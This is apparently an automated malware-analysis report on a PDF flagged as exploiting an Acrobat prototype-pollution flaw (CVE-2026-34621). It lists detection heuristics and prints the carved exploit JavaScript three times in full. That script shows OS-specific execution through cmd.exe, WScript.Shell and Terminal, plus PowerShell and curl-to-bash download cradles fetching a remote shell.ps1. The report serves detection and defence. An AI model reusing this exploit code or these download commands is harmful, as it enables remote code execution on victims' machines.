PDF malware analysis — malicious · 1fd50be72a6a4b63

MALICIOUS

PDF

4.7 KB First seen: 2026-05-09

MD5: a193ce66f894dc2c9b7271e25691cf5d SHA-1: 94ff24e8865f853dfdca5401ca657181656438d2 SHA-256: 1fd50be72a6a4b637f804c42464b3c515492c06f672763d6cda5b3743f6f0987

326 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 0.9997

Heuristics 10

Acrobat prototype-pollution PoC/exploit pattern — CVE-2026-34621 related critical CVE likely CVE_2026_34621_RELATED

PDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain.
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Prototype-pollution JavaScript pattern high CVE related PDF_JS_PROTOTYPE_POLLUTION

PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCH

Embedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.
Matched line in script
```
            app.launchURL('https://www.example.com', true);
```
PowerShell download cradle in PDF action body critical PDF_PS_DOWNLOAD_CRADLE

PDF contains a PowerShell download-and-execute cradle (IEX/Invoke-Expression of a remote payload, [Net.WebClient]/[Net.ServicePointManager], or `-ep Bypass -enc <base64>`). These strings are rare in benign PDFs and are strong evidence of payload staging in an attack chain (MITRE T1059.001 + T1105).
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD

PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
app.launchURL with file/cmd/UNC target high PDF_FOXIT_LAUNCHURL

PDF JavaScript invokes app.launchURL() with a file://, cmd:, or UNC target — Foxit and Adobe handle these schemes inconsistently and they have been used for code execution and NTLM credential theft. (matched in decompressed stream)
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://10.0.0.5/shell.ps1 Referenced by PDF JavaScript
- https://www.example.comReferenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0006_000.js`	pdf-javascript-stream	PDF /JS object 6 at offset 0x15	4009 bytes
SHA-256: `88234c688e3b839873315712604de53d40b6150a8d0e36ee66b0a288e3ae2b26`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 9 shell/COM execution token(s).
Preview script First 1,000 lines of the extracted script (function _lwtlognoyvam() { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-27T11:34:38.132101 // === Prototype Pollution (CVE-2026-34621) === try { Object.prototype.__defineGetter__('__trusted', function() { return true; }); Object.prototype.constructor.prototype.bypass = true; Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; } catch(e) {} // === OS Detection === var os = 'unknown'; try { if (typeof app !== 'undefined' && app.platform) { var pf = app.platform.toLowerCase(); if (pf.indexOf('win') >= 0) os = 'windows'; else if (pf.indexOf('mac') >= 0) os = 'macos'; } if (os === 'unknown' && typeof navigator !== 'undefined') { var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf('windows') >= 0) os = 'windows'; else if (ua.indexOf('mac') >= 0) os = 'macos'; else if (ua.indexOf('android') >= 0) os = 'android'; else if (ua.indexOf('iphone') >= 0 \|\| ua.indexOf('ipad') >= 0) os = 'ios'; } // Adobe-specific mobile detection if (typeof app !== 'undefined' && app.viewerType) { if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) os = 'android'; // or ios } } catch(e) {} // === OS-Specific Execution === try { if (os === 'windows') { // Method 1: app.launchURL with cmd.exe try { app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent("calc.exe"), true); } catch(e1) {} // Method 2: ActiveX WScript.Shell try { var shell = new ActiveXObject('WScript.Shell'); shell.Run("calc.exe", 0, false); } catch(e2) {} // Method 3: PowerShell staged download try { var shell = new ActiveXObject('WScript.Shell'); shell.Run("powershell -NoP -Ep Bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')"", 0, false); } catch(e3) {} } else if (os === 'macos') { // Method 1: Terminal via file:// try { app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("open /System/Applications/Calculator.app"), true); } catch(e1) {} // Method 2: osascript try { var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"'; app.launchURL('osascript://' + encodeURIComponent(script)); } catch(e2) {} // Method 3: curl pipe to bash try { app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("curl -s http://10.0.0.5/shell.ps1 \| bash"), true); } catch(e3) {} } else { // Mobile platforms: demo fallback (not vulnerable) try { app.launchURL('https://www.example.com', true); app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.'); } catch(e) {} } } catch(mainErr) {} // Additional trigger: attempt privileged file read to escalate context try { if (typeof util !== 'undefined' && util.readFileIntoStream) { var path = (os === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts'; util.readFileIntoStream({cDIPath: path, bEncodeBase64: true}); } } catch(e) {} })();
`javascript_obj0006_001.js`	pdf-javascript-stream	PDF /JS object 6 at offset 0x15	4160 bytes
SHA-256: `1bdd4ac4a458c9b73fca91fff124fd16847ddca1cc743885682f35224746bad0`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 9 shell/COM execution token(s).
Preview script First 1,000 lines of the extracted script << /JS ( \(function _lwtlognoyvam\(\) { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-27T11:34:38.132101 // === Prototype Pollution \(CVE-2026-34621\) === try { Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\); Object.prototype.constructor.prototype.bypass = true; Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; } catch\(e\) {} // === OS Detection === var os = 'unknown'; try { if \(typeof app !== 'undefined' && app.platform\) { var pf = app.platform.toLowerCase\(\); if \(pf.indexOf\('win'\) >= 0\) os = 'windows'; else if \(pf.indexOf\('mac'\) >= 0\) os = 'macos'; } if \(os === 'unknown' && typeof navigator !== 'undefined'\) { var ua = navigator.userAgent.toLowerCase\(\); if \(ua.indexOf\('windows'\) >= 0\) os = 'windows'; else if \(ua.indexOf\('mac'\) >= 0\) os = 'macos'; else if \(ua.indexOf\('android'\) >= 0\) os = 'android'; else if \(ua.indexOf\('iphone'\) >= 0 \|\| ua.indexOf\('ipad'\) >= 0\) os = 'ios'; } // Adobe-specific mobile detection if \(typeof app !== 'undefined' && app.viewerType\) { if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) os = 'android'; // or ios } } catch\(e\) {} // === OS-Specific Execution === try { if \(os === 'windows'\) { // Method 1: app.launchURL with cmd.exe try { app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\("calc.exe"\), true\); } catch\(e1\) {} // Method 2: ActiveX WScript.Shell try { var shell = new ActiveXObject\('WScript.Shell'\); shell.Run\("calc.exe", 0, false\); } catch\(e2\) {} // Method 3: PowerShell staged download try { var shell = new ActiveXObject\('WScript.Shell'\); shell.Run\("powershell -NoP -Ep Bypass -C "IEX\(New-Object Net.WebClient\).DownloadString\('http://10.0.0.5/shell.ps1'\)"", 0, false\); } catch\(e3\) {} } else if \(os === 'macos'\) { // Method 1: Terminal via file:// try { app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\("open /System/Applications/Calculator.app"\), true\); } catch\(e1\) {} // Method 2: osascript try { var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"'; app.launchURL\('osascript://' + encodeURIComponent\(script\)\); } catch\(e2\) {} // Method 3: curl pipe to bash try { app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\("curl -s http://10.0.0.5/shell.ps1 \| bash"\), true\); } catch\(e3\) {} } else { // Mobile platforms: demo fallback \(not vulnerable\) try { app.launchURL\('https://www.example.com', true\); app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\); } catch\(e\) {} } } catch\(mainErr\) {} // Additional trigger: attempt privileged file read to escalate context try { if \(typeof util !== 'undefined' && util.readFileIntoStream\) { var path = \(os === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts'; util.readFileIntoStream\({cDIPath: path, bEncodeBase64: true}\); } } catch\(e\) {} }\)\(\); ) /S /JavaScript >>
`combined_document_js_000.js`	deobfuscated-js	combined document JavaScript streams at offset 0x15	8170 bytes
SHA-256: `cd419c63d77887fbe97ee9cd2bbaade749dad6f54fe67dba771bd97dac9476b3`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 18 shell/COM execution token(s).
Preview script First 1,000 lines of the extracted script (function _lwtlognoyvam() { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-27T11:34:38.132101 // === Prototype Pollution (CVE-2026-34621) === try { Object.prototype.__defineGetter__('__trusted', function() { return true; }); Object.prototype.constructor.prototype.bypass = true; Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; } catch(e) {} // === OS Detection === var os = 'unknown'; try { if (typeof app !== 'undefined' && app.platform) { var pf = app.platform.toLowerCase(); if (pf.indexOf('win') >= 0) os = 'windows'; else if (pf.indexOf('mac') >= 0) os = 'macos'; } if (os === 'unknown' && typeof navigator !== 'undefined') { var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf('windows') >= 0) os = 'windows'; else if (ua.indexOf('mac') >= 0) os = 'macos'; else if (ua.indexOf('android') >= 0) os = 'android'; else if (ua.indexOf('iphone') >= 0 \|\| ua.indexOf('ipad') >= 0) os = 'ios'; } // Adobe-specific mobile detection if (typeof app !== 'undefined' && app.viewerType) { if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) os = 'android'; // or ios } } catch(e) {} // === OS-Specific Execution === try { if (os === 'windows') { // Method 1: app.launchURL with cmd.exe try { app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent("calc.exe"), true); } catch(e1) {} // Method 2: ActiveX WScript.Shell try { var shell = new ActiveXObject('WScript.Shell'); shell.Run("calc.exe", 0, false); } catch(e2) {} // Method 3: PowerShell staged download try { var shell = new ActiveXObject('WScript.Shell'); shell.Run("powershell -NoP -Ep Bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')"", 0, false); } catch(e3) {} } else if (os === 'macos') { // Method 1: Terminal via file:// try { app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("open /System/Applications/Calculator.app"), true); } catch(e1) {} // Method 2: osascript try { var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"'; app.launchURL('osascript://' + encodeURIComponent(script)); } catch(e2) {} // Method 3: curl pipe to bash try { app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent("curl -s http://10.0.0.5/shell.ps1 \| bash"), true); } catch(e3) {} } else { // Mobile platforms: demo fallback (not vulnerable) try { app.launchURL('https://www.example.com', true); app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.'); } catch(e) {} } } catch(mainErr) {} // Additional trigger: attempt privileged file read to escalate context try { if (typeof util !== 'undefined' && util.readFileIntoStream) { var path = (os === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts'; util.readFileIntoStream({cDIPath: path, bEncodeBase64: true}); } } catch(e) {} })(); << /JS ( \(function _lwtlognoyvam\(\) { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-27T11:34:38.132101 // === Prototype Pollution \(CVE-2026-34621\) === try { Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\); Object.prototype.constructor.prototype.bypass = true; Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; } catch\(e\) {} // === OS Detection === var os = 'unknown'; try { if \(typeof app !== 'undefined' && app.platform\) { var pf = app.platform.toLowerCase\(\); if \(pf.indexOf\('win'\) >= 0\) os = 'windows'; else if \(pf.indexOf\('mac'\) >= 0\) os = 'macos'; } if \(os === 'unknown' && typeof navigator !== 'undefined'\) { var ua = navigator.userAgent.toLowerCase\(\); if \(ua.indexOf\('windows'\) >= 0\) os = 'windows'; else if \(ua.indexOf\('mac'\) >= 0\) os = 'macos'; else if \(ua.indexOf\('android'\) >= 0\) os = 'android'; else if \(ua.indexOf\('iphone'\) >= 0 \|\| ua.indexOf\('ipad'\) >= 0\) os = 'ios'; } // Adobe-specific mobile detection if \(typeof app !== 'undefined' && app.viewerType\) { if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) os = 'android'; // or ios } } catch\(e\) {} // === OS-Specific Execution === try { if \(os === 'windows'\) { // Method 1: app.launchURL with cmd.exe try { app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\("calc.exe"\), true\); } catch\(e1\) {} // Method 2: ActiveX WScript.Shell try { var shell = new ActiveXObject\('WScript.Shell'\); shell.Run\("calc.exe", 0, false\); } catch\(e2\) {} // Method 3: PowerShell staged download try { var shell = new ActiveXObject\('WScript.Shell'\); shell.Run\("powershell -NoP -Ep Bypass -C "IEX\(New-Object Net.WebClient\).DownloadString\('http://10.0.0.5/shell.ps1'\)"", 0, false\); } catch\(e3\) {} } else if \(os === 'macos'\) { // Method 1: Terminal via file:// try { app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\("open /System/Applications/Calculator.app"\), true\); } catch\(e1\) {} // Method 2: osascript try { var script = 'do shell script "' + "open /System/Applications/Calculator.app" + '"'; app.launchURL\('osascript://' + encodeURIComponent\(script\)\); } catch\(e2\) {} // Method 3: curl pipe to bash try { app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\("curl -s http://10.0.0.5/shell.ps1 \| bash"\), true\); } catch\(e3\) {} } else { // Mobile platforms: demo fallback \(not vulnerable\) try { app.launchURL\('https://www.example.com', true\); app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\); } catch\(e\) {} } } catch\(mainErr\) {} // Additional trigger: attempt privileged file read to escalate context try { if \(typeof util !== 'undefined' && util.readFileIntoStream\) { var path = \(os === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts'; util.readFileIntoStream\({cDIPath: path, bEncodeBase64: true}\); } } catch\(e\) {} }\)\(\); ) /S /JavaScript >>

Open this report in the interactive analyzer, or submit your own file for analysis.